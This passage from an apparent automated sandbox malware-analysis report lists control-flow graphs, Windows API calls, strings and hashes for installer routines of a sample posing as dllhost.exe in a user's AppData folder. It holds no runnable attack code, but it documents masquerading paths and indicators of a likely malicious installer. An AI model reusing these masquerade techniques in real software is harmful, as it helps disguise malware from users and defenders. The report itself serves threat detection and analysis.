                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: L)Z${$6B
                                                                              • API String ID: 590372296-3746735139
                                                                              • Opcode ID: 44484b69dfab64248b971870e4f1fa2f017bd6e205110b4c47fe376a49196580
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 44484b69dfab64248b971870e4f1fa2f017bd6e205110b4c47fe376a49196580
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                              Function 00403D08 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346windowstringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: L)Z$6B
                                                                              • API String ID: 3282139019-282312273
                                                                              • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                                              Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,7570D4C4,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-3853068990
                                                                              • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                                              Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dllhost.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 4283519449-3159565494
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                                              Function 0040626E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 209stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 450 4064b5-4064b8 447->450 451 4064a9-4064b3 447->451 452 406330-40633b 448->452 453 40644a-40644e 448->453 450->440 451->440 454 406354 452->454 455 40633d-406342 452->455 456 406450-406456 453->456 457 406481-406485 453->457 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 472 406477-40647d 461->472 462->472 468 406364-406366 463->468 469 406367-406369 463->469 465->454 470 40634e-406352 465->470 468->469 473 4063a4-4063a7 469->473 474 40636b-406389 call 40611a 469->474 470->463 472->458 478 40647f 472->478 476 4063b7-4063ba 473->476 477 4063a9-4063b5 GetSystemDirectoryW 473->477 480 40638e-406392 474->480 482 406425-406427 476->482 483 4063bc-4063ca GetWindowsDirectoryW 476->483 481 406429-40642d 477->481 479 406442-406448 call 4064e0 478->479 479->458 486 406432-406435 480->486 487 406398-40639f call 40626e 480->487 481->479 485 40642f 481->485 482->481 484 4063cc-4063d6 482->484 483->482 492 4063f0-406406 SHGetSpecialFolderLocation 484->492 493 4063d8-4063db 484->493 485->486 486->479 489 406437-40643d lstrcatW 486->489 487->481 489->479 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063ee SHGetFolderPathW 493->495 495->481 495->492 496->482 497->481 497->496
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                                                              • SHGetFolderPathW.SHELL32(004052E7,00000000,00000000,: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,005A5ADC,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(005A5ADC,: Completed), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(005A5ADC), ref: 00406417
                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 1812420262-905382516
                                                                              • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                                              Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 562 4052b0-4052c5 563 4052cb-4052dc 562->563 564 40537c-405380 562->564 565 4052e7-4052f3 lstrlenW 563->565 566 4052de-4052e2 call 40626e 563->566 568 405310-405314 565->568 569 4052f5-405305 lstrlenW 565->569 566->565 571 405323-405327 568->571 572 405316-40531d SetWindowTextW 568->572 569->564 570 405307-40530b lstrcatW 569->570 570->568 573 405329-40536b SendMessageW * 3 571->573 574 40536d-40536f 571->574 572->571 573->574 574->564 575 405371-405374 574->575 575->564
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
